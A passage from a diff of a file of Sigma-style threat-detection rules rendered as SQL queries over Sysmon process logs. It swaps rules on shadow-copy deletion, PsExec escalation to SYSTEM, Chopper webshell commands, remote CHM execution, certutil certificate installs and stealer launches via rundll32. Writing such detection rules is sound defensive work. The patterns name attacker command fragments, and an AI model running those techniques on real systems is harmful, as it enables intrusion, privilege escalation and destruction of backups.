"f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\discord.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_electron_app_children.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "New Root Certificate Installed Via Certutil.EXE", - "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", - "status": "test", - "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "Local Groups Reconnaissance Via Wmic.EXE", + "id": "164eda96-11b2-430b-85ff-6a265c15bf32", + "status": "experimental", + "description": "Detects the execution of \"wmic\" with the \"group\" flag.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '% group%' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_certificate_installation.yml" + "filename": "proc_creation_win_wmic_recon_group.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", + "title": "Visual Studio NodejsTools PressAnyKey Renamed Execution", + "id": "65c3ca2c-525f-4ced-968e-246a713d164f", "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'Microsoft.NodejsTools.PressAnyKey.exe' AND NOT ((Image LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_renamed_pressanykey.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "status": "experimental", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine 
LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE 
'% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", - "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", "status": "experimental", - "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", - "author": "TropChaud", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'RUNDLL32.EXE' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE 
'%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "DriverQuery.EXE Execution", - "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", - "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.discovery" - ], + "title": "Password Provided In Command Line Of Net.EXE", + "id": "d4498716-1d52-438f-8084-4a603157d131", + "status": "test", + "description": "Detects a when net.exe is called with a password in the command line", + "author": "Tim Shelton (HAWK.IO)", "falsepositives": [ - "Legitimate use by third party tools in order to investigate installed drivers" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" ], - "filename": "proc_creation_win_driverquery_usage.yml" + "filename": "proc_creation_win_net_use_password_plaintext.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", - "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. 
NATBypass)", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "title": "Use Icacls to Hide File to Everyone", + "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", "status": "experimental", - "description": "Detect usage of the 
\"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "author": "frack113", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'iCACLS.EXE' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_icacls_deny.yml" }, { - "title": "Powershell Inline Execution From A File", - "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", - "status": "experimental", - "description": "Detects inline execution of PowerShell code from a file", - "author": "frack113", + "title": "PUA - Mouse Lock Execution", + "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "status": "test", + "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed 
legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", + "author": "Cian Heasley", + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ], "falsepositives": [ - "Unknown" + "Legitimate uses of Mouse Lock software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_exec_data_file.yml" + "filename": "proc_creation_win_pua_mouselock_execution.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.execution" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "Potential Execution of Sysinternals Tools", - "id": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", - "status": "experimental", - "description": "Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools", - "author": "Markus Neis", + "title": "Files Added To An Archive Using Rar.EXE", + "id": "6f3e2987-db24-4c78-a860-b4f4095a7095", + "status": "test", + "description": "Detects usage of \"rar\" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate use of SysInternals tools", - "Programs that use the same command line flag" + "Highly likely if rar is a default archiver in the monitored environment." 
], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -accepteula%' ESCAPE '\\' OR CommandLine LIKE '% /accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rar.exe' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_eula_accepted.yml" + "filename": "proc_creation_win_rar_compress_data.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", + "title": "Findstr Launching .lnk File", + "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", + "author": "Trent Liffick", "tags": [ "attack.defense_evasion", - "attack.t1574", - "attack.execution" + "attack.t1036", + "attack.t1202", + "attack.t1027.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + 
"filename": "proc_creation_win_findstr_lnk.yml" }, { - "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", - "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", - "author": "frack113", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112", + "attack.t1562.001" ], "falsepositives": [ - "App-V clients" + "Rare legitimate add to registry via cli (to these locations)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems 
Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" - ], + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "status": "experimental", + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' 
ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "DumpMinitool Usage", - "id": "dee0a7a3-f200-4112-a99b-952196d81e42", + "title": "Logged-On User Password Change Via Ksetup.EXE", + "id": "c9783e20-4793-4164-ba96-d9ee483992c4", "status": "experimental", - "description": "Detects the use of \"DumpMinitool.exe\" a tool bundled with Visual Studio and DotNTET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects password change for the logged-on user's via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') OR (CommandLine LIKE '% --processId %' ESCAPE '\\' AND CommandLine LIKE '% --dumpType Full%' ESCAPE '\\')))" + 